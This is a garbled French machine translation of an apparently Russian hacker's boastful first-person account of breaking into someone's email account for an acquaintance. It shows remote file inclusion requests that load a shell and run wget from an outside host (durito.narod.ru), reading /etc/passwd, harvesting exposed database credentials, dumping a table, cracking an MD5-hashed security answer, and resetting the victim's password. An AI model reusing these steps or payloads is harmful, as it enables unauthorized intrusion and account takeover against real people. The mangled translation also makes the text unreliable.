|
Il est arrivé que je ne prenais jamais en place des savons de piratage.
Puis vint une offre alléchante
d'une connaissance, qui ont désespérément besoin d'un accès à la même savon.
Inutile de savon a été localisé sur une petite mailer * .co.uk.
Familier Brutus a essayé de savon, mais il n'a pas donné des résultats, et il se tourna vers moi.
Au début , je lui prostmotrel mailer.
En outre , la fenêtre entrez votre login / mot de passe, tout html solide.
J'ai essayé de former un mot de passe sur le Sql-injection, mais citations filtré.
Serveur: Apache / 1.3.34 (Unix) PHP / 5.0.5 mod_auth_passthrough / 1.8 mod_log_bytes / 1.2 mod_bwlimited / 1.4 FrontPage / 5.0.2.2635 mod_ssl / 8.2.25 OpenSSL / 0.9.7a
Une ouverture, services portuaires également pas content.
Je décidai de vérifier, si hébergé quelqu'un d' autre ici.
Il a été trouvé par ip nombre donné quelques dizaines de sites.
Walked sur eux, seulement il se phpBB patché, de sorte qu'aucun de l'exploit n'a pas fonctionné.
Et puis je suis tombé sur le ArticleBeach produit www.articlebeach.com.
La première demande:
http: page //www.***.com/index.php = http :? //durito.narod.ru/sh&cmd=ls%20-lpa
m'a donné une liste de fichiers sur le serveur.
programmeurs ArticleBeach ne devraient pas manger leur propre pain et le beurre.
site polaziv je trouve encore un bug, les développeurs gentiment laissés ArticleBeach,
dans le répertoire / includes / tout utilisateur peut afficher le fichier config.inc comme suit:
Exemple de fichier pris par les développeurs du site ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
mondiale _CN $;
$ Dbserver mondiale;
$ Db mondial;
$ Dbuser mondiale;
$ Dbpass mondiale;
// Serveur de base de données mysql, login, mot de passe et base de données nom
$ Dbserver = "localhost";
$ Database_connect = "article_art";
$ Dbuser = "article_jer";
$ Dbpass = "aaaaa";
$ Connect = mysql_connect ($ dbserver, $ dbuser, $ dbpass)
or die ( "Impossible de se connecter à MySQL");
mysql_select_db ($ database_connect, $ connect) ;
?>
Comme vous le savez , ce sont les détails de l' accès au serveur de base de données.
Malheureusement , dans mon cas, le mot de passe pour la base de données ne sont pas venus à la FTP,
neskazhesh ce que sur les autres sites où il est un produit de ArticleBeach.
Je devais creuser à travers le inkluda du serveur externe.
Ouverture / etc / passwd, je ne pouvais pas trouver le nom de l'expéditeur à moi,
les utilisateurs de connexion et les noms de domaine sont des sites dépareillées.
Mais a pu voir le répertoire web-utilisateur: / home / * / public_html /
Déjà je voulais commencer une sorte terne à travers toutes la liste, mais a décidé de vérifier le fichier accounting.log
qui stocke les noms d'utilisateur et les noms de domaine dans le cPanel.
Et bien sûr, je suis une liste de noms de domaine.
Je choisis le droit et a commencé à étudier le répertoire web.
Trouvez rapidement les détails dans le code source pour accéder à la base de données MySQL:
'Base de données' => '*** _ themail', // Nom de votre base de données MySQL
'Username' => '*** _ facteur', // Le nom d' utilisateur et mot de passe
'Password' => 'jkretj3h45j'
Mot de passe à nouveau ne vient pas à l'ftp.
Il ne reste plus qu'à accrocher à la base de données.
Nous avons dû chercher répertoire inscriptible ou d'un fichier.
Et encore une fois, grâce aux développeurs ArticleBeach qui a pris soin de son produit sur le répertoire / backup / drwxrwxrwx avec des droits.
http: Page //www.***.com/index.php = http :? //durito.narod.ru/sh&cmd=wget -O sauvegarde / sql.php http://durito.narod.ru/sql. php
et les figues, la même chose avec GET, des liens, aller chercher, lynx.
Plus tard , j'appris que l' exécution de wget et GET PHP interdit sécurisé, des liens, aller chercher et le lynx été absent.
Examen interne continue des sites d'accueil.
Navyuzhival plusieurs mots de passe à la base de données, mais ils ne reviennent pas à la FTP, tous les mots de passe étaient de plusieurs abracadabra.
Et soudain le site taïwanais, l' intuition a dit de le vérifier et ici il est - le mot de passe pour accéder à la base de données - anahol !!!
Konekt vers FTP, passent et le script de travailler avec des bases de données de rst.void.ru remplies.
base de données Konekt, trouver la bonne table et Dampleux il.
Et voici le savon chéri, bien que le mot de passe crypté MD5,
mais cela est facilement résolu, si long et morne.
Mais d' abord, je décide de vérifier le hachage http://md5.rednoize.com/, mais la passe
et je ne l' avais pas trouvé qu'il était déjà prêt pour une longue recherche, mais alors remarqué que la réponse à la question de sécurité, aussi, est codé en MD5.
Poinçons sur md5.rednoize.com question secrète et la voici: Cheung !!!
Je ne viens pas Mailer et répondre à la question secrète.
Je propose d'introduire un nouveau mot de passe et le confirmer.
Checkmate!
Et mon ami obtient l' accès au savon convoité, nezabyv je roule sur la bière.
Et je me retire ses genoux.
publié le www.xakep.ru
Votre bug Durito.
_________________
MANGER LES RICHES!
|
Commentaires
Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.